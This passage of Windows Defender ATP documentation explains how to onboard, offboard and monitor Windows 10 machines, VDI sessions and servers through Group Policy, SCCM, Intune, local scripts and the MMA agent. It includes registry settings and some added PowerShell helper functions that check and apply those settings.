3. In the Group Policy Management Editor, go to Computer configuration.
4. Click Policies, then Administrative templates.
5. Click Windows components and then Windows Defender ATP.
6. Choose to enable or disable sample sharing from your machines.

NOTE
If you don't set a value, the default value is to enable sample collection.

Offboard machines using Group Policy


For security reasons, the package used to offboard machines expires 30 days after the date it was
downloaded. Expired offboarding packages sent to a machine will be rejected. When downloading an
offboarding package you will be notified of the package's expiry date, and the date is also included in the
package name.

NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will
cause unpredictable collisions.

1. Get the offboarding package from Windows Defender Security Center:


a. In the navigation pane, select Settings > Offboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select Group policy.
d. Click Download package and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the machine.
You should have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.
3. Open the Group Policy Management Console (GPMC), right-click the Group Policy Object (GPO) you
want to configure and click Edit.
4. In the Group Policy Management Editor, go to Computer configuration, then Preferences, and
then Control panel settings.
5. Right-click Scheduled tasks, point to New, and then click Immediate task.
6. In the Task window that opens, go to the General tab. Choose the local SYSTEM user account under
Security options.
7. Select Run whether user is logged on or not and check the Run with highest privileges check box.
8. Go to the Actions tab and click New.... Ensure that Start a program is selected in the Action field.
Enter the file name and location of the shared
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd file.
9. Click OK and close any open GPMC windows.

IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal but data from the machine, including reference
to any alerts it has had will be retained for up to 6 months.

Monitor machine configuration


With Group Policy there isn’t an option to monitor deployment of policies on the machines. Monitoring can be
done directly on the portal, or by using the different deployment tools.

Monitor machines using the portal


1. Go to Windows Defender Security Center.
2. Click Machines list.
3. Verify that machines are appearing.

NOTE
It can take several days for machines to start showing on the Machines list. This includes the time it takes for the policies
to be distributed to the machine, the time it takes before the user logs on, and the time it takes for the endpoint to start
reporting.

Related topics
Onboard Windows 10 machines using System Center Configuration Manager
Onboard Windows 10 machines using Mobile Device Management tools
Onboard Windows 10 machines using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) machines
Run a detection test on a newly onboarded Windows Defender ATP machines
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Onboard Windows 10 machines using System Center
Configuration Manager
4/8/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
System Center 2012 Configuration Manager or later versions

Onboard Windows 10 machines using System Center Configuration Manager (current branch) version 1606
System Center Configuration Manager (SCCM) (current branch) version 1606 has UI-integrated support for
configuring and managing Windows Defender ATP on machines. For more information, see Support for Windows
Defender Advanced Threat Protection service.

NOTE
If you’re using SCCM client version 1606 with server version 1610 or above, you must upgrade the client version to match
the server version.

Onboard Windows 10 machines using System Center Configuration Manager earlier versions
You can use existing System Center Configuration Manager functionality to create a policy to configure your
machines. This is supported in the following System Center Configuration Manager versions:
System Center 2012 Configuration Manager
System Center 2012 R2 Configuration Manager
System Center Configuration Manager (current branch), version 1511
System Center Configuration Manager (current branch), version 1602
Onboard machines using System Center Configuration Manager
1. Open the SCCM configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
downloaded from the service onboarding wizard. You can also get the package from Windows Defender
Security Center:
a. In the navigation pane, select Settings > Onboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select System Center Configuration Manager 2012/2012
R2/1511/1602.
d. Click Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the network
administrators who will deploy the package. You should have a file named
WindowsDefenderATPOnboardingScript.cmd.
3. Deploy the package by following the steps in the Packages and Programs in Configuration Manager topic.
a. Choose a predefined device collection to deploy the package to.

NOTE
Windows Defender ATP doesn't support onboarding during the Out-Of-Box Experience (OOBE) phase. Make sure users
complete OOBE after running Windows installation or upgrading.

TIP
After onboarding the machine, you can choose to run a detection test to verify that a machine is properly onboarded to
the service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.

Configure sample collection settings


For each machine, you can set a configuration value to state whether samples can be collected from the machine
when a request is made through Windows Defender Security Center to submit a file for deep analysis.
You can set a compliance rule for a configuration item in System Center Configuration Manager to change the
sample share setting on a machine. This rule should be a remediating compliance rule configuration item that sets
the value of a registry key on targeted machines to make sure they're compliant.
The configuration is set through the following registry value:

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Value: 0 or 1

Where:
Value type is REG_DWORD.
Possible values are:
0 - doesn't allow sample sharing from this machine
1 - allows sharing of all file types from this machine
The default value in case the registry value doesn't exist is 1.
For more information about System Center Configuration Manager Compliance see Get started with compliance
settings in System Center Configuration Manager.

Offboard machines using System Center Configuration Manager


For security reasons, the package used to offboard machines expires 30 days after the date it was downloaded.
Expired offboarding packages sent to a machine will be rejected. When downloading an offboarding package you
will be notified of the package's expiry date, and the date is also included in the package name.

NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will cause
unpredictable collisions.

1. Get the offboarding package from Windows Defender Security Center:


a. In the navigation pane, select Settings > Offboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select System Center Configuration Manager 2012/2012
R2/1511/1602.
d. Click Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the network
administrators who will deploy the package. You should have a file named
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.
3. Deploy the package by following the steps in the Packages and Programs in Configuration Manager topic.
a. Choose a predefined device collection to deploy the package to.

IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal but data from the machine, including reference to
any alerts it has had will be retained for up to 6 months.

Monitor machine configuration


Monitoring with SCCM consists of two parts:
1. Confirming the configuration package has been correctly deployed and is running (or has successfully run)
on the machines in your network.
2. Checking that the machines are compliant with the Windows Defender ATP service (this ensures the
machine can complete the onboarding process and can continue to report data to the service).
To confirm the configuration package has been correctly deployed:
1. In the SCCM console, click Monitoring at the bottom of the navigation pane.
2. Click Overview and then Deployments.
3. Click on the deployment with the package name.
4. Review the status indicators under Completion Statistics and Content Status.
If there are failed deployments (machines with Error, Requirements Not Met, or Failed statuses), you may
need to troubleshoot the machines. For more information see, Troubleshoot Windows Defender Advanced Threat
Protection onboarding issues.
Check that the machines are compliant with the Windows Defender ATP service:
You can set a compliance rule for configuration item in System Center Configuration Manager to monitor your
deployment.
This rule should be a non-remediating compliance rule configuration item that monitors the value of a registry
key on targeted machines.
Monitor the following registry value:

Path: HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status
Name: OnboardingState
Value: 1 (REG_DWORD)

For more information about System Center Configuration Manager Compliance see Get started with compliance
settings in System Center Configuration Manager.

Related topics
Onboard Windows 10 machines using Group Policy
Onboard Windows 10 machines using Mobile Device Management tools
Onboard Windows 10 machines using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) machines
Run a detection test on a newly onboarded Windows Defender ATP machine
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Onboard Windows 10 machines using Mobile Device
Management tools
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

You can use mobile device management (MDM) solutions to configure machines. Windows Defender ATP supports
MDMs by providing OMA-URIs to create policies to manage machines.
For more information on using Windows Defender ATP CSP see, WindowsAdvancedThreatProtection CSP and
WindowsAdvancedThreatProtection DDF file.

Before you begin


If you're using Microsoft Intune, the device must be enrolled in MDM. Otherwise, settings will not be applied
successfully.
For more information on enabling MDM with Microsoft Intune, see Setup Windows Device Management.

Onboard machines using Microsoft Intune


Follow the instructions from Intune.
For more information on using Windows Defender ATP CSP see, WindowsAdvancedThreatProtection CSP and
WindowsAdvancedThreatProtection DDF file.

NOTE
The Health Status for onboarded machines policy uses read-only properties and can't be remediated.
Configuration of diagnostic data reporting frequency is only available for machines on Windows 10, version 1703.

TIP
After onboarding the machine, you can choose to run a detection test to verify that a machine is properly onboarded to the
service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.

Offboard and monitor machines using Mobile Device Management tools
For security reasons, the package used to offboard machines expires 30 days after the date it was downloaded.
Expired offboarding packages sent to a machine will be rejected. When downloading an offboarding package you
will be notified of the package's expiry date, and the date is also included in the package name.
NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will cause
unpredictable collisions.

1. Get the offboarding package from Windows Defender Security Center:


a. In the navigation pane, select Settings > Offboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select Mobile Device Management / Microsoft Intune.
d. Click Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the network
administrators who will deploy the package. You should have a file named
WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding.
3. Use the Microsoft Intune custom configuration policy to deploy the supported offboarding OMA-URI settings of
the WindowsAdvancedThreatProtection CSP referenced above (the Offboarding node, whose value is the contents of
the .offboarding file, and the read-only HealthState nodes used to confirm the result). For more information
on Microsoft Intune policy settings see Windows 10 policy settings in Microsoft Intune.

NOTE
The Health Status for offboarded machines policy uses read-only properties and can't be remediated.

IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal but data from the machine, including reference to
any alerts it has had will be retained for up to 6 months.

Related topics
Onboard Windows 10 machines using Group Policy
Onboard Windows 10 machines using System Center Configuration Manager
Onboard Windows 10 machines using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) machines
Run a detection test on a newly onboarded Windows Defender ATP machine
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Onboard Windows 10 machines using a local script
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

You can also manually onboard individual machines to Windows Defender ATP. You might want to do this first
when testing the service before you commit to onboarding all machines in your network.

NOTE
The script has been optimized to be used on a limited number of machines (1-10 machines). To deploy at scale, use other
deployment options. For more information on using other deployment options, see Onboard Windows 10 machines.

Onboard machines
1. Open the configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
downloaded from the service onboarding wizard. You can also get the package from Windows Defender
Security Center:
a. In the navigation pane, select Settings > Onboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select Local Script.
d. Click Download package and save the .zip file.
2. Extract the contents of the configuration package to a location on the machine you want to onboard (for
example, the Desktop). You should have a file named WindowsDefenderATPOnboardingScript.cmd.
3. Open an elevated command-line prompt on the machine and run the script:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPOnboardingScript.cmd
5. Press the Enter key or click OK.
For information on how you can manually validate that the machine is compliant and correctly reports sensor
data see, Troubleshoot Windows Defender Advanced Threat Protection onboarding issues.

TIP
After onboarding the machine, you can choose to run a detection test to verify that a machine is properly onboarded to
the service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.

Configure sample collection settings


For each machine, you can set a configuration value to state whether samples can be collected from the machine
when a request is made through Windows Defender Security Center to submit a file for deep analysis.
You can manually configure the sample sharing setting on the machine by using regedit or creating and running
a .reg file.
The configuration is set through the following registry key entry:

Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
Name: "AllowSampleCollection"
Value: 0 or 1

Where:
Name type is a DWORD.
Possible values are:
0 - doesn't allow sample sharing from this machine
1 - allows sharing of all file types from this machine
The default value in case the registry key doesn't exist is 1.
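As an added example (not code from the Microsoft documentation), the following PowerShell functions write the AllowSampleCollection DWORD described above and report the effective setting, including the documented default of 1 when the value is absent. The key and value names are the page's; the function names are my own.

```powershell
# Added example, not from the Microsoft page. Registry path and value name are
# taken from the documentation above; function names are my own.
$PolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$ValueName  = 'AllowSampleCollection'

function Get-WdatpSampleCollection {
    # Returns the effective setting. Per the docs, a missing value means 1 (allow).
    $item = Get-ItemProperty -Path $PolicyPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{
            Configured = $false
            Value      = 1
            Effect     = 'allows sharing of all file types (default, value absent)'
        }
    }
    $v = [int]$item.$ValueName
    $effect = switch ($v) {
        0       { "doesn't allow sample sharing from this machine" }
        1       { 'allows sharing of all file types from this machine' }
        default { "unexpected value $v; only 0 and 1 are documented" }
    }
    [pscustomobject]@{ Configured = $true; Value = $v; Effect = $effect }
}

function Set-WdatpSampleCollection {
    # Only 0 and 1 are valid; anything else is rejected before touching the registry.
    param([Parameter(Mandatory)][ValidateSet(0, 1)][int]$Value)
    # The policy key may not exist on a machine that has never had this setting pushed.
    if (-not (Test-Path $PolicyPath)) { New-Item -Path $PolicyPath -Force | Out-Null }
    # The value must be a DWORD, as the documentation states.
    New-ItemProperty -Path $PolicyPath -Name $ValueName -PropertyType DWord -Value $Value -Force | Out-Null
    Get-WdatpSampleCollection
}

# Usage from an elevated PowerShell prompt:
#   Set-WdatpSampleCollection -Value 0   # block deep-analysis sample submission
#   Get-WdatpSampleCollection
```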

Offboard machines using a local script


For security reasons, the package used to offboard machines will expire 30 days after the date it was
downloaded. Expired offboarding packages sent to a machine will be rejected. When downloading an
offboarding package you will be notified of the package's expiry date, and it will also be included in the package
name.

NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will
cause unpredictable collisions.

1. Get the offboarding package from Windows Defender Security Center:


a. In the navigation pane, select Settings > Offboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select Local Script.
d. Click Download package and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the machines.
You should have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.
3. Open an elevated command-line prompt on the machine and run the script:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd
5. Press the Enter key or click OK.

IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal, but data from the machine, including references
to any alerts it has had, will be retained for up to 6 months.
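Because an expired package is rejected by the service, a pre-flight check on the date embedded in the script name saves a wasted run. This is an added example, not part of the Microsoft documentation; the file-name pattern is the one documented above, and the function names are my own.

```powershell
# Added example, not from the Microsoft page. The file-name pattern comes from the
# documentation above; the function names are my own.
function Test-WdatpOffboardingPackage {
    param(
        [Parameter(Mandatory)][string]$ScriptPath,
        [datetime]$Today = (Get-Date).Date
    )
    $name = [System.IO.Path]::GetFileName($ScriptPath)
    # The valid_until date is part of the documented file name.
    if ($name -notmatch '^WindowsDefenderATPOffboardingScript_valid_until_(\d{4}-\d{2}-\d{2})\.cmd$') {
        throw "Unexpected file name '$name'; expected WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd"
    }
    $validUntil = [datetime]::ParseExact($Matches[1], 'yyyy-MM-dd', [cultureinfo]::InvariantCulture)
    $daysLeft   = ($validUntil - $Today).Days
    [pscustomobject]@{
        Script     = $name
        ValidUntil = $validUntil.ToString('yyyy-MM-dd')
        DaysLeft   = $daysLeft
        Expired    = ($daysLeft -lt 0)
    }
}

function Invoke-WdatpOffboarding {
    param([Parameter(Mandatory)][string]$ScriptPath)
    $check = Test-WdatpOffboardingPackage -ScriptPath $ScriptPath
    if ($check.Expired) {
        # The service would reject this package anyway; fail early with a clear reason.
        throw "Offboarding package expired on $($check.ValidUntil); download a fresh package from Settings > Offboarding."
    }
    if ($check.DaysLeft -le 3) { Write-Warning "Package expires in $($check.DaysLeft) day(s)." }
    # Runs the .cmd exactly as step 4 does; requires an elevated prompt.
    & $ScriptPath
}

# Usage (constructed sample path):
#   Test-WdatpOffboardingPackage -ScriptPath "$env:USERPROFILE\Desktop\WindowsDefenderATPOffboardingScript_valid_until_2019-06-01.cmd"
```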

Monitor machine configuration


You can follow the different verification steps in the Troubleshoot onboarding issues to verify that the script
completed successfully and the agent is running.
Monitoring can also be done directly on the portal, or by using the different deployment tools.
Monitor machines using the portal
1. Go to Windows Defender Security Center.
2. Click Machines list.
3. Verify that machines are appearing.

Related topics
Onboard Windows 10 machines using Group Policy
Onboard Windows 10 machines using System Center Configuration Manager
Onboard Windows 10 machines using Mobile Device Management tools
Onboard non-persistent virtual desktop infrastructure (VDI) machines
Run a detection test on a newly onboarded Windows Defender ATP machine
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Onboard non-persistent virtual desktop infrastructure (VDI) machines
4/5/2019 • 2 minutes to read

Applies to:
Virtual desktop infrastructure (VDI) machines

Want to experience Windows Defender ATP? Sign up for a free trial.

Onboard non-persistent virtual desktop infrastructure (VDI) machines


Windows Defender ATP supports non-persistent VDI session onboarding. There might be associated challenges
when onboarding VDIs. The following are typical challenges for this scenario:
Instant early onboarding of a short-lived session
A session should be onboarded to Windows Defender ATP prior to the actual provisioning.
Machine name persistence
The machine names are typically reused for new sessions. Some may want them represented as a single
machine entry while others may prefer to have multiple entries per machine name.
You can onboard VDI machines using a single entry or multiple entries for each machine. The following steps will
guide you through onboarding VDI machines and will highlight steps for single and multiple entries.

WARNING
For environments where there are low resource configurations, the VDI boot procedure might slow the Windows Defender
ATP sensor onboarding.

1. Open the VDI configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
downloaded from the service onboarding wizard. You can also get the package from Windows Defender
Security Center:
a. In the navigation pane, select Settings > Onboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select VDI onboarding scripts for non-persistent endpoints.
d. Click Download package and save the .zip file.
2. Copy the extracted files from the .zip into the golden/master image under the path
C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup. You should have a folder called
WindowsDefenderATPOnboardingPackage containing the file WindowsDefenderATPOnboardingScript.cmd.

NOTE
If you don't see the C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder, it might be hidden.
You'll need to choose the Show hidden files and folders option from file explorer.
3. The following step is only applicable if you're implementing a single entry for each machine:
For single entry for each machine:
a. From the WindowsDefenderATPOnboardingPackage folder, copy the Onboard-NonPersistentMachine.ps1 file to
the golden/master image under the path C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup.

NOTE
If you don't see the C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder, it might be hidden.
You'll need to choose the Show hidden files and folders option from file explorer.

4. Open a Local Group Policy Editor window and navigate to Computer Configuration > Windows
Settings > Scripts > Startup.
5. Depending on the method you'd like to implement, follow the appropriate steps:
For single entry for each machine:
Select the PowerShell Scripts tab, then click Add (Windows Explorer will open directly in the path where
you copied the onboarding script earlier). Navigate to the onboarding PowerShell script
Onboard-NonPersistentMachine.ps1.

For multiple entries for each machine:


Select the Scripts tab, then click Add (Windows Explorer will open directly in the path where you copied
the onboarding script earlier). Navigate to the onboarding batch script
WindowsDefenderATPOnboardingScript.cmd.

6. Test your solution:


a. Create a pool with one machine.
b. Log on to the machine.
c. Log off from the machine.
d. Log on to the machine with another user.
e. For single entry for each machine: Check that only one entry appears in Windows Defender Security Center.
For multiple entries for each machine: Check that multiple entries appear in Windows Defender Security Center.
7. Click Machines list on the Navigation pane.
8. Use the search function by entering the machine name and select Machine as the search type.

Related topics
Onboard Windows 10 machines using Group Policy
Onboard Windows 10 machines using System Center Configuration Manager
Onboard Windows 10 machines using Mobile Device Management tools
Onboard Windows 10 machines using a local script
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Onboard servers to the Windows Defender ATP service
5/3/2019 • 8 minutes to read

Applies to:
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803
Windows Server, 2019
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prerelease product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Want to experience Windows Defender ATP? Sign up for a free trial.

Windows Defender ATP extends support to also include the Windows Server operating system, providing
advanced attack detection and investigation capabilities, seamlessly through the Windows Defender Security
Center console.
The service supports the onboarding of the following servers:
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803
Windows Server 2019
For practical guidance on what needs to be in place for licensing and infrastructure, see Protecting Windows
Servers with Windows Defender ATP.

Windows Server 2012 R2 and Windows Server 2016


There are two options to onboard Windows Server 2012 R2 and Windows Server 2016 to Windows Defender
ATP:
Option 1: Onboard through Azure Security Center
Option 2: Onboard through Windows Defender Security Center
Option 1: Onboard servers through Azure Security Center
1. In the navigation pane, select Settings > Machine management > Onboarding.
2. Select Windows Server 2012 R2 and 2016 as the operating system.
3. Click Onboard Servers in Azure Security Center.
4. Follow the onboarding instructions in Windows Defender Advanced Threat Protection with Azure Security
Center.
Option 2: Onboard servers through Windows Defender Security Center
You'll need to take the following steps if you choose to onboard servers through Windows Defender Security
Center.
For Windows Server 2012 R2: Configure and update System Center Endpoint Protection clients.

NOTE
This step is required only if your organization uses System Center Endpoint Protection (SCEP) and you're onboarding
Windows Server 2012 R2.

Turn on server monitoring from Windows Defender Security Center.


If you're already leveraging System Center Operations Manager (SCOM) or Azure Monitor (formerly known
as Operations Management Suite (OMS)), simply attach the Microsoft Monitoring Agent (MMA) to report to
your Windows Defender ATP workspace through Multi Homing support. Otherwise, install and configure
MMA to report sensor data to Windows Defender ATP as instructed below. For more information, see Collect
log data with Azure Log Analytics agent.

TIP
After onboarding the machine, you can choose to run a detection test to verify that it is properly onboarded to the service.
For more information, see Run a detection test on a newly onboarded Windows Defender ATP endpoint.

Configure and update System Center Endpoint Protection clients

IMPORTANT
This step is required only if your organization uses System Center Endpoint Protection (SCEP) and you're onboarding
Windows Server 2012 R2.

Windows Defender ATP integrates with System Center Endpoint Protection to provide visibility to malware
detections and to stop propagation of an attack in your organization by banning potentially malicious files or
suspected malware.
The following steps are required to enable this integration:
Install the January 2017 anti-malware platform update for Endpoint Protection clients
Configure the SCEP client Cloud Protection Service membership to the Advanced setting
Turn on Server monitoring from the Windows Defender Security Center portal
1. In the navigation pane, select Settings > Machine management > Onboarding.
2. Select Windows Server 2012 R2 and 2016 as the operating system.
3. Click Turn on server monitoring and confirm that you'd like to proceed with the environment setup.
When the setup completes, the Workspace ID and Workspace key fields are populated with unique
values. You'll need to use these values to configure the MMA agent.
Install and configure Microsoft Monitoring Agent (MMA) to report sensor data to Windows Defender ATP
1. Download the agent setup file: Windows 64-bit agent.
2. Using the Workspace ID and Workspace key provided in the previous procedure, choose any of the
following installation methods to install the agent on the server:
Manually install the agent using setup
On the Agent Setup Options page, choose Connect the agent to Azure Log Analytics (OMS).
Install the agent using the command line and configure the agent using a script.
3. You'll need to configure proxy settings for the Microsoft Monitoring Agent. For more information, see
Configure proxy settings.
Once completed, you should see onboarded servers in the portal within an hour.
Configure server proxy and Internet connectivity settings
Each Windows server must be able to connect to the Internet using HTTPS. This connection can be direct,
using a proxy, or through the OMS Gateway.
If a proxy or firewall is blocking all traffic by default and allowing only specific domains through, or HTTPS
scanning (SSL inspection) is enabled, make sure that the following URLs are white-listed to permit
communication with the Windows Defender ATP service:

AGENT RESOURCE                      PORTS
*.oms.opinsights.azure.com          443
*.blob.core.windows.net             443
*.azure-automation.net              443
*.ods.opinsights.azure.com          443
winatp-gw-cus.microsoft.com         443
winatp-gw-eus.microsoft.com         443
winatp-gw-neu.microsoft.com         443
winatp-gw-weu.microsoft.com         443
winatp-gw-uks.microsoft.com         443
winatp-gw-ukw.microsoft.com         443
winatp-gw-aus.microsoft.com         443
winatp-gw-aue.microsoft.com         443

Windows Server, version 1803 and Windows Server 2019


To onboard Windows Server, version 1803 or Windows Server 2019, use the same method used when
onboarding Windows 10 machines.
Supported tools include:
Local script
Group Policy
System Center Configuration Manager 2012 / 2012 R2 1511 / 1602
VDI onboarding scripts for non-persistent machines
For more information, see Onboard Windows 10 machines. Support for Windows Server, version 1803
and Windows Server 2019 provides deeper insight into activities happening on the server, coverage for kernel and
memory attack detection, and enables response actions on Windows Server endpoints as well.
1. Configure Windows Defender ATP onboarding settings on the server. For more information, see Onboard
Windows 10 machines.
2. If you're running a third-party antimalware solution, you'll need to apply the following Windows Defender
AV passive mode settings and verify that they were configured correctly:
a. Set the following registry entry:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: ForceDefenderPassiveMode
Value: 1
b. Run the following PowerShell command to verify that the passive mode was configured:
Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-Sense"; ID=84}

c. Confirm that a recent event containing the passive mode event is found:

3. Run the following command to check if Windows Defender AV is installed:


sc query Windefend

If the result is 'The specified service does not exist as an installed service', then you'll need to install
Windows Defender AV. For more information, see Windows Defender Antivirus in Windows 10.
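The checks in steps 2 and 3 above can be run as one PowerShell function that reads the ForceDefenderPassiveMode value, looks for Sense event ID 84, and confirms the WinDefend service exists. This is an added example rather than Microsoft's code; the registry path, value name, event provider and ID, and service name are from the page, and the function name is my own.

```powershell
# Added example, not from the Microsoft page. Registry path/value, event
# provider/ID and service name are taken from the documentation above.
function Test-WdatpPassiveMode {
    $policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $result = [ordered]@{}

    # Step 2a: ForceDefenderPassiveMode must be present and set to 1.
    $reg = Get-ItemProperty -Path $policy -Name ForceDefenderPassiveMode -ErrorAction SilentlyContinue
    $result.RegistryValue = if ($reg) { [int]$reg.ForceDefenderPassiveMode } else { $null }
    $result.RegistryOk    = ($result.RegistryValue -eq 1)

    # Step 2b/2c: Sense event ID 84 records that the sensor applied passive mode.
    # Get-WinEvent reports "No events were found" as a non-terminating error, so
    # SilentlyContinue leaves $evt empty when the event has not been logged yet.
    $evt = Get-WinEvent -FilterHashtable @{ProviderName='Microsoft-Windows-Sense'; ID=84} `
                        -MaxEvents 1 -ErrorAction SilentlyContinue
    $result.PassiveModeEventTime = if ($evt) { $evt.TimeCreated } else { $null }
    $result.EventOk = [bool]$evt

    # Step 3: Windows Defender AV must still be installed ("sc query Windefend").
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $result.WinDefendInstalled = [bool]$svc
    $result.WinDefendStatus    = if ($svc) { $svc.Status.ToString() } else { 'not installed' }

    $result.AllChecksPassed = $result.RegistryOk -and $result.EventOk -and $result.WinDefendInstalled
    [pscustomobject]$result
}

# Usage from an elevated PowerShell on the server:
#   Test-WdatpPassiveMode | Format-List
```

If AllChecksPassed is false, the individual fields show which of the three conditions is missing; a missing event with a correct registry value usually just means the sensor has not restarted since the value was set.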

Integration with Azure Security Center


Windows Defender ATP integrates with Azure Security Center to provide a comprehensive server protection
solution. With this integration Azure Security Center can leverage the power of Windows Defender ATP to
provide improved threat detection for Windows Servers.

NOTE
You'll need to have the appropriate license to enable this feature.

The following capabilities are included in this integration:


Automated onboarding - Windows Defender ATP sensor is automatically enabled on Windows Servers
that are onboarded to Azure Security Center. For more information on Azure Security Center onboarding,
see Onboarding to Azure Security Center Standard for enhanced security.

NOTE
Automated onboarding is only applicable for Windows Server 2012 R2 and Windows Server 2016.

Servers monitored by Azure Security Center will also be available in Windows Defender ATP - Azure
Security Center seamlessly connects to the Windows Defender ATP tenant, providing a single view across
clients and servers. In addition, Windows Defender ATP alerts will be available in the Azure Security Center
console.
Server investigation - Azure Security Center customers can access Windows Defender Security Center to
perform detailed investigation to uncover the scope of a potential breach.

IMPORTANT
When you use Azure Security Center to monitor servers, a Windows Defender ATP tenant is automatically created. The
Windows Defender ATP data is stored in Europe by default.
If you use Windows Defender ATP before using Azure Security Center, your data will be stored in the location you
specified when you created your tenant even if you integrate with Azure Security Center at a later time.

Offboard servers
You can offboard Windows Server, version 1803 and Windows Server 2019 using the same method available for Windows
10 client machines.
For other server versions, you have two options to offboard servers from the service:
Uninstall the MMA agent
Remove the Windows Defender ATP workspace configuration

NOTE
Offboarding causes the server to stop sending sensor data to the portal, but data from the server, including references to any
alerts it has had, will be retained for up to 6 months.

Offboard servers by uninstalling the MMA agent


To offboard the server, you can uninstall the MMA agent from the server or detach it from reporting to your
Windows Defender ATP workspace. After offboarding the agent, the server will no longer send sensor data to
Windows Defender ATP. For more information, see To disable an agent.
Remove the Windows Defender ATP workspace configuration
To offboard the server, you can use either of the following methods:
Remove the Windows Defender ATP workspace configuration from the MMA agent
Run a PowerShell command to remove the configuration
Remove the Windows Defender ATP workspace configuration from the MMA agent
1. In the Microsoft Monitoring Agent Properties, select the Azure Log Analytics (OMS) tab.
2. Select the Windows Defender ATP workspace, and click Remove.
Run a PowerShell command to remove the configuration
1. Get your Workspace ID:
a. In the navigation pane, select Settings > Onboarding.
b. Select Windows Server 2012 R2 and 2016 as the operating system and get your Workspace ID:

2. Open an elevated PowerShell and run the following command, replacing WorkspaceID with the Workspace
ID you obtained:
# Workspace ID from step 1 (placeholder; replace before running)
$WorkspaceID = "WorkspaceID"
# Load agent scripting object
$AgentCfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg
# Remove OMS Workspace
$AgentCfg.RemoveCloudWorkspace($WorkspaceID)
# Reload the configuration and apply changes
$AgentCfg.ReloadConfiguration()

Related topics
Onboard Windows 10 machines
Onboard non-Windows machines
Configure proxy and Internet connectivity settings
Run a detection test on a newly onboarded Windows Defender ATP machine
Troubleshooting Windows Defender Advanced Threat Protection onboarding issues
Onboard non-Windows machines
4/24/2019 • 2 minutes to read • Edit Online

Applies to:
macOS
Linux
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Windows Defender ATP provides a centralized security operations experience for Windows as well as non-
Windows platforms. You'll be able to see alerts from various supported operating systems (OS) in Windows
Defender Security Center and better protect your organization's network.
You'll need to know the exact Linux distros and macOS versions that are compatible with Windows Defender ATP
for the integration to work.

Onboarding non-Windows machines


